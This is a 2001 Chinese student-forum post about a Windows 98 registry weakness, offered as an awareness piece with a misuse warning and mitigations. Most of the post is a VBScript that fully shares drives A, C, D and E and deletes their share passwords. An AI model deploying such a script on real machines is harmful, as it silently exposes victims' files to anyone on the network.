● Win98系统的一个漏洞!! - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: Mic (霸王丸), 信区: Microsoft
标  题: Win98系统的一个漏洞!!
发信站: 荔园晨风BBS站 (Mon Apr  9 14:38:55 2001), 转信

——一个可以完全控制计算机读写资源的BUG
                                                        原作：   汤告老
师（tomgoo@yeah.net）

郑重警告：请不要利用这个漏洞进行不法行为……

众所周知，Win98系统的bug多多，是一个非常脆弱的系统，最近，俺发现了一个比
较恐怖的注册表bug，这个bug可以使你的计算机在网络上打开大门，完全暴露，完
全共享，后果不堪设想……
很多人有时候为了方便，会在Win98的“网络”属性——“配置”的“文件及打印
共享”项的“允许其他用户访问我的文件”和“允许其他计算机使用我的打印机”
前面打上小勾，然后在硬盘“共享”里面的“根据密码访问”   设置一个只读或
完全访问的密码，以为这样就可以万无一失了；其实，有心人只要写一个vbs的小
程序，当你在不知晓的情况下运行，就可以使你的Win98系统不受密码的保护，完
全暴露在网络上，这样，别人就可以在你的计算机里随意阅读、增删文件，胡作非
为了。
这个vbs小程序通过修改Win98的注册表实现：
On   error   resume   next                                 ‘假如出现错
误，跳到下一行执行
Set   wscr=CreateObject("wscript.shell")             ‘建立wscript调用模
式
wscr.regwrite   "HKEY_LOCAL_MACHINE\System\Currentc   o   ntrolSet\c   o
   ntrol\ComputerName\ComputerName\ComputerName","Share"

‘将计算机名修改为“Share”
wscr.regwrite   "HKEY_LOCAL_MACHINE\System\Currentc   o
ntrolSet\Services\VxD\VNETSUP\ComputerName","Share"
‘将计算机名修改为“Share”
for   i=1   to   4                           ‘循环4次
        if   i=1   then                       ‘   第一次循环
              DriveName="A"           ‘驱动器名为“A”
        else   if   i=2   then                         ‘第二次循环
                        DriveName="C"           ‘驱动器名为“C”
                  else   if   i=3   then                 ‘第三次循环
                                  DriveName="D"           ‘驱动器名为“
D”
                            else   if   i=4   then               ‘第四
次循环
                                            DriveName="E"           ‘驱
动器名为“E”
                                      end   if
                            end   if
                  end   if
        end   if
wscr.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\La
nMan\"   &DriveName&   "\Flags",402,"REG_DWORD"                 ‘把驱动
器完全共享
wscr.regDelete
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\La
nMan\"   &   DriveName   &"\Parm1enc"
          ‘删除驱动器完全访问密码
wscr.regDelete
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\La
nMan\"   &   DriveName   &"\Parm2enc"
      ‘删除驱动器只读密码
wscr.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\La
nMan\"   &   DriveName   &"\Path",DriveName&":\"
‘设置访问路径
wscr.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\La
nMan\"   &   DriveName   &"\Remark","Share"
  ‘设置驱动器共享注释
wscr.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\La
nMan\"   &   DriveName   &"\Type",0,"REG_DWORD"                 ‘   设
置驱动器类型
next
当运行以上这个vbs程序并重启你的计算机后，你会发现你的软盘A、硬盘（或光驱
）C、D、E已全部共享，在你接入网络后，别人用网络工具查找“Share”的计算机
，进入你的计算机后，你的资源便可以让别人任意使用了，而你却毫不知情……
~_~
或许，微软公司应该为注册表加把锁，不能让别人随便修改它……
解决的方法：
1、   不要随便执行不明来历的vbs文件（特别是E-mail信箱里面的）。
2、   不要访问一些信任度不高的网站。
2、把“允许其他用户访问我的文件”和“允许其他计算机使用我的打印机”前面
的小勾去掉。
        本文只是希望大家了解这个漏洞，以便更好的防患于未然……^_^，利用
这个漏洞违法犯罪者，后果自负。
        假如大家还有什么问题，欢迎来E-mail：tomgoo@yeah.net

--
               ﹀                ▲                   ▲    \  /
           ﹀                   ▲▲▲   ▲▲  ?    ▲▲▲― ● ―
         ﹀                                       ▲ ▲▎▲ /  \            ▃
            ▁▅    ▁▃▇█▅▃▁               ▲▲┻▍▲             ▃▇█
    ▁▃▅▇███▅▁    ∞:      ∞:                 ▍       ▁▃▅████
                       ∞:    ∞:           ├┼┼┬ γ▍γγ┤       m i c ◤

※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.28.108]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店